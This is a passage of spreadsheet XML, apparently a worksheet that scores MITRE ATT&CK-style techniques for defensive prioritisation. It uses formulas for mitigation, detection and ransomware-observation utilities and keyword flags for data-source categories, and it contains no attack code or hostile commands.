      <c r="U383" s="57"/>
      <c r="V383" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W383" s="37"/>
      <c r="X383" s="37"/>
      <c r="Y383" s="37"/>
      <c r="Z383" s="37"/>
      <c r="AA383" s="37"/>
      <c r="AB383" s="37"/>
      <c r="AC383" s="37"/>
      <c r="AD383" s="50" t="s">
        <v>646</v>
      </c>
      <c r="AE383" s="37" t="str" cm="1">
        <f t="array" ref="AE383">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD383)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF383" s="37">
        <v>379</v>
      </c>
      <c r="AG383" s="37" t="str" cm="1">
        <f t="array" ref="AG383">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD383)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH383" s="37">
        <v>379</v>
      </c>
      <c r="AI383" s="37" t="str" cm="1">
        <f t="array" ref="AI383">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD383)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ383" s="37">
        <v>379</v>
      </c>
      <c r="AK383" s="37" t="str" cm="1">
        <f t="array" ref="AK383">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD383)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL383" s="37">
        <v>379</v>
      </c>
      <c r="AM383" s="37" t="str" cm="1">
        <f t="array" ref="AM383">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD383)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN383" s="37"/>
      <c r="AO383" s="37"/>
      <c r="AP383" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ383" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>50.56666666666667</v>
      </c>
      <c r="AR383" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS383" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT383" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU38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84" spans="1:47" ht="85">
      <c r="A384" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B384" s="37">
        <f t="shared" si="5"/>
        <v>474.40743257142861</v>
      </c>
      <c r="C384" s="37" t="s">
        <v>1348</v>
      </c>
      <c r="D384" s="50" t="s">
        <v>1349</v>
      </c>
      <c r="E384" s="37"/>
      <c r="F384" s="37">
        <v>2</v>
      </c>
      <c r="G384" s="37">
        <v>1</v>
      </c>
      <c r="H384" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.15000000000000002</v>
      </c>
      <c r="I384" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.2</v>
      </c>
      <c r="J384" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="K384" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L384" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M384" s="37">
        <v>0</v>
      </c>
      <c r="N384" s="56">
        <v>0</v>
      </c>
      <c r="O384" s="56">
        <v>3</v>
      </c>
      <c r="P384" s="56">
        <v>5</v>
      </c>
      <c r="Q384" s="56">
        <v>0</v>
      </c>
      <c r="R384" s="57" t="s">
        <v>1350</v>
      </c>
      <c r="S384" s="57">
        <v>6</v>
      </c>
      <c r="T384" s="57" t="s">
        <v>422</v>
      </c>
      <c r="U384" s="57">
        <v>7</v>
      </c>
      <c r="V384" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.16190495238095237</v>
      </c>
      <c r="W384" s="37">
        <v>13</v>
      </c>
      <c r="X384" s="37">
        <v>0.23636399999999999</v>
      </c>
      <c r="Y384" s="37">
        <v>0.23636399999999999</v>
      </c>
      <c r="Z384" s="37">
        <v>8</v>
      </c>
      <c r="AA384" s="37">
        <v>0.08</v>
      </c>
      <c r="AB384" s="37">
        <v>0.08</v>
      </c>
      <c r="AC384" s="37"/>
      <c r="AD384" s="50" t="s">
        <v>1351</v>
      </c>
      <c r="AE384" s="37" t="str" cm="1">
        <f t="array" ref="AE384">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD384)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF384" s="37">
        <v>380</v>
      </c>
      <c r="AG384" s="37" t="str" cm="1">
        <f t="array" ref="AG384">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD384)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH384" s="37">
        <v>380</v>
      </c>
      <c r="AI384" s="37" t="str" cm="1">
        <f t="array" ref="AI384">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD384)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ384" s="37">
        <v>380</v>
      </c>
      <c r="AK384" s="37" t="str" cm="1">
        <f t="array" ref="AK384">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD384)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL384" s="37">
        <v>380</v>
      </c>
      <c r="AM384" s="37" t="str" cm="1">
        <f t="array" ref="AM384">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD384)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN384" s="37">
        <v>0</v>
      </c>
      <c r="AO384" s="37">
        <v>1</v>
      </c>
      <c r="AP384" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ384" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>158.13581085714287</v>
      </c>
      <c r="AR384" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS384" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT384" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU38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3.7889478775510206</v>
      </c>
    </row>
    <row r="385" spans="1:47" ht="34">
      <c r="A385" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B385" s="37">
        <f t="shared" si="5"/>
        <v>537.38095238095252</v>
      </c>
      <c r="C385" s="37" t="s">
        <v>1352</v>
      </c>
      <c r="D385" s="50" t="s">
        <v>1349</v>
      </c>
      <c r="E385" s="37" t="s">
        <v>1353</v>
      </c>
      <c r="F385" s="37">
        <v>1</v>
      </c>
      <c r="G385" s="37">
        <v>1</v>
      </c>
      <c r="H385" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I385" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J385" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K385" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L385" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M385" s="37">
        <v>0</v>
      </c>
      <c r="N385" s="56">
        <v>1</v>
      </c>
      <c r="O385" s="56">
        <v>5</v>
      </c>
      <c r="P385" s="56">
        <v>0</v>
      </c>
      <c r="Q385" s="56">
        <v>3</v>
      </c>
      <c r="R385" s="57" t="s">
        <v>1354</v>
      </c>
      <c r="S385" s="57">
        <v>6</v>
      </c>
      <c r="T385" s="57" t="s">
        <v>1355</v>
      </c>
      <c r="U385" s="57">
        <v>16</v>
      </c>
      <c r="V385" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.25238095238095243</v>
      </c>
      <c r="W385" s="37">
        <v>22</v>
      </c>
      <c r="X385" s="37">
        <v>0.4</v>
      </c>
      <c r="Y385" s="37">
        <v>0.4</v>
      </c>
      <c r="Z385" s="37">
        <v>9</v>
      </c>
      <c r="AA385" s="37">
        <v>0.09</v>
      </c>
      <c r="AB385" s="37">
        <v>0.09</v>
      </c>
      <c r="AC385" s="37"/>
      <c r="AD385" s="50" t="s">
        <v>1356</v>
      </c>
      <c r="AE385" s="37" t="str" cm="1">
        <f t="array" ref="AE385">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD385)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF385" s="37">
        <v>381</v>
      </c>
      <c r="AG385" s="37" t="str" cm="1">
        <f t="array" ref="AG385">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD385)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH385" s="37">
        <v>381</v>
      </c>
      <c r="AI385" s="37" t="str" cm="1">
        <f t="array" ref="AI385">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD385)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ385" s="37">
        <v>381</v>
      </c>
      <c r="AK385" s="37" t="str" cm="1">
        <f t="array" ref="AK385">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD385)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL385" s="37">
        <v>381</v>
      </c>
      <c r="AM385" s="37" t="str" cm="1">
        <f t="array" ref="AM385">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD385)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN385" s="37">
        <v>0</v>
      </c>
      <c r="AO385" s="37">
        <v>0</v>
      </c>
      <c r="AP385" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ385" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>179.12698412698418</v>
      </c>
      <c r="AR385" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS385" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT385" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU38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86" spans="1:47" ht="51">
      <c r="A386" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B386" s="37">
        <f t="shared" si="5"/>
        <v>509.66652104761903</v>
      </c>
      <c r="C386" s="37" t="s">
        <v>1357</v>
      </c>
      <c r="D386" s="50" t="s">
        <v>1349</v>
      </c>
      <c r="E386" s="37" t="s">
        <v>1358</v>
      </c>
      <c r="F386" s="37">
        <v>1</v>
      </c>
      <c r="G386" s="37">
        <v>1</v>
      </c>
      <c r="H386" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I386" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J386" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K386" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L386" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M386" s="37">
        <v>0</v>
      </c>
      <c r="N386" s="56">
        <v>0</v>
      </c>
      <c r="O386" s="56">
        <v>3</v>
      </c>
      <c r="P386" s="56">
        <v>1</v>
      </c>
      <c r="Q386" s="56">
        <v>3</v>
      </c>
      <c r="R386" s="57" t="s">
        <v>1359</v>
      </c>
      <c r="S386" s="57">
        <v>13</v>
      </c>
      <c r="T386" s="57" t="s">
        <v>1360</v>
      </c>
      <c r="U386" s="57">
        <v>8</v>
      </c>
      <c r="V386" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.23333323809523809</v>
      </c>
      <c r="W386" s="37">
        <v>21</v>
      </c>
      <c r="X386" s="37">
        <v>0.38181799999999999</v>
      </c>
      <c r="Y386" s="37">
        <v>0.38181799999999999</v>
      </c>
      <c r="Z386" s="37">
        <v>7</v>
      </c>
      <c r="AA386" s="37">
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AB386" s="37">
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AC386" s="37"/>
      <c r="AD386" s="50" t="s">
        <v>1314</v>
      </c>
      <c r="AE386" s="37" t="str" cm="1">
        <f t="array" ref="AE386">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD386)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF386" s="37">
        <v>382</v>
      </c>
      <c r="AG386" s="37" t="str" cm="1">
        <f t="array" ref="AG386">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD386)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH386" s="37">
        <v>382</v>
      </c>
      <c r="AI386" s="37" t="str" cm="1">
        <f t="array" ref="AI386">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD386)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ386" s="37">
        <v>382</v>
      </c>
      <c r="AK386" s="37" t="str" cm="1">
        <f t="array" ref="AK386">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD386)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL386" s="37">
        <v>382</v>
      </c>
      <c r="AM386" s="37" t="str" cm="1">
        <f t="array" ref="AM386">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD386)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN386" s="37">
        <v>0</v>
      </c>
      <c r="AO386" s="37">
        <v>0</v>
      </c>
      <c r="AP386" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ386" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>169.88884034920633</v>
      </c>
      <c r="AR386" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS386" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT386" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU38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87" spans="1:47" ht="51">
      <c r="A387" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B387" s="37">
        <f t="shared" si="5"/>
        <v>459.89985399999995</v>
      </c>
      <c r="C387" s="37" t="s">
        <v>1361</v>
      </c>
      <c r="D387" s="50" t="s">
        <v>1349</v>
      </c>
      <c r="E387" s="37" t="s">
        <v>1362</v>
      </c>
      <c r="F387" s="37">
        <v>1</v>
      </c>
      <c r="G387" s="37">
        <v>1</v>
      </c>
      <c r="H387" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I387" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J387" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K387" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L387" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M387" s="37">
        <v>0</v>
      </c>
      <c r="N387" s="56">
        <v>0</v>
      </c>
      <c r="O387" s="56">
        <v>0</v>
      </c>
      <c r="P387" s="56">
        <v>0</v>
      </c>
      <c r="Q387" s="56">
        <v>0</v>
      </c>
      <c r="R387" s="57" t="s">
        <v>114</v>
      </c>
      <c r="S387" s="57">
        <v>10</v>
      </c>
      <c r="T387" s="57" t="s">
        <v>1363</v>
      </c>
      <c r="U387" s="57">
        <v>11</v>
      </c>
      <c r="V387" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.19999990476190477</v>
      </c>
      <c r="W387" s="37">
        <v>21</v>
      </c>
      <c r="X387" s="37">
        <v>0.38181799999999999</v>
      </c>
      <c r="Y387" s="37">
        <v>0.38181799999999999</v>
      </c>
      <c r="Z387" s="37">
        <v>0</v>
      </c>
      <c r="AA387" s="37">
        <v>0</v>
      </c>
      <c r="AB387" s="37">
        <v>0</v>
      </c>
      <c r="AC387" s="37"/>
      <c r="AD387" s="50" t="s">
        <v>1314</v>
      </c>
      <c r="AE387" s="37" t="str" cm="1">
        <f t="array" ref="AE387">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD387)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF387" s="37">
        <v>383</v>
      </c>
      <c r="AG387" s="37" t="str" cm="1">
        <f t="array" ref="AG387">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD387)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH387" s="37">
        <v>383</v>
      </c>
      <c r="AI387" s="37" t="str" cm="1">
        <f t="array" ref="AI387">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD387)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ387" s="37">
        <v>383</v>
      </c>
      <c r="AK387" s="37" t="str" cm="1">
        <f t="array" ref="AK387">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD387)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL387" s="37">
        <v>383</v>
      </c>
      <c r="AM387" s="37" t="str" cm="1">
        <f t="array" ref="AM387">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD387)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN387" s="37">
        <v>0</v>
      </c>
      <c r="AO387" s="37">
        <v>1</v>
      </c>
      <c r="AP387" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ387" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>153.29995133333333</v>
      </c>
      <c r="AR387" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS387" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT387" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU38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3.6738083650793647</v>
      </c>
    </row>
    <row r="388" spans="1:47" ht="34">
      <c r="A388" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B388" s="37">
        <f t="shared" si="5"/>
        <v>365.95245414285716</v>
      </c>
      <c r="C388" s="37" t="s">
        <v>1364</v>
      </c>
      <c r="D388" s="50" t="s">
        <v>1349</v>
      </c>
      <c r="E388" s="37" t="s">
        <v>1365</v>
      </c>
      <c r="F388" s="37">
        <v>1</v>
      </c>
      <c r="G388" s="37">
        <v>1</v>
      </c>
      <c r="H388" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I388" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J388" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K388" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L388" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M388" s="37">
        <v>0</v>
      </c>
      <c r="N388" s="56">
        <v>0</v>
      </c>
      <c r="O388" s="56">
        <v>5</v>
      </c>
      <c r="P388" s="56">
        <v>7</v>
      </c>
      <c r="Q388" s="56">
        <v>5</v>
      </c>
      <c r="R388" s="57" t="s">
        <v>141</v>
      </c>
      <c r="S388" s="57">
        <v>3</v>
      </c>
      <c r="T388" s="57" t="s">
        <v>1366</v>
      </c>
      <c r="U388" s="57">
        <v>3</v>
      </c>
      <c r="V388" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.13809528571428573</v>
      </c>
      <c r="W388" s="37">
        <v>6</v>
      </c>
      <c r="X388" s="37">
        <v>0.10909099999999999</v>
      </c>
      <c r="Y388" s="37">
        <v>0.10909099999999999</v>
      </c>
      <c r="Z388" s="37">
        <v>17</v>
      </c>
      <c r="AA388" s="37">
        <v>0.17</v>
      </c>
      <c r="AB388" s="37">
        <v>0.17</v>
      </c>
      <c r="AC388" s="37"/>
      <c r="AD388" s="50" t="s">
        <v>1367</v>
      </c>
      <c r="AE388" s="37" t="str" cm="1">
        <f t="array" ref="AE388">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD388)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF388" s="37">
        <v>384</v>
      </c>
      <c r="AG388" s="37" t="str" cm="1">
        <f t="array" ref="AG388">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD388)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH388" s="37">
        <v>384</v>
      </c>
      <c r="AI388" s="37" t="str" cm="1">
